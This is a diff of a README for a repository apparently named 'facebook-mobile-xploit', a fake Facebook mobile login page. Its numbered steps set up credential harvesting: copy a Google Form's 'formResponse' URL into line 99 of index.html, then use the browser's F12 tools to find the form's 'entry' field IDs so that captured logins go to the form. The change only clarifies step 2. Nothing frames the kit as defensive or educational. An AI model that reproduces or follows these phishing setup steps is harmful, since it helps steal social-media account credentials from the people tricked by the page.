MTHS1901/facebook-login-screen-mobile/README.md

 ### 2. click to view the form and obtain the form ID.
 <img src = "https://raw.githubusercontent.com/MTHS1901/facebook-mobile-xploit/master/2.png" width = "350">
-replace the url ID on the line below https://github.com/MTHS1901/facebook-mobile-xploit/blob/ac7972d1dd7fe1e6899d6ca3828bf294d609f987/index.html#L99
+replace the url ID ONLY on the line below, note it ends with "formResponse" https://github.com/MTHS1901/facebook-mobile-xploit/blob/ac7972d1dd7fe1e6899d6ca3828bf294d609f987/index.html#L99

 ### 3. press f12 and get both "entry.XXXXXXX" from your form.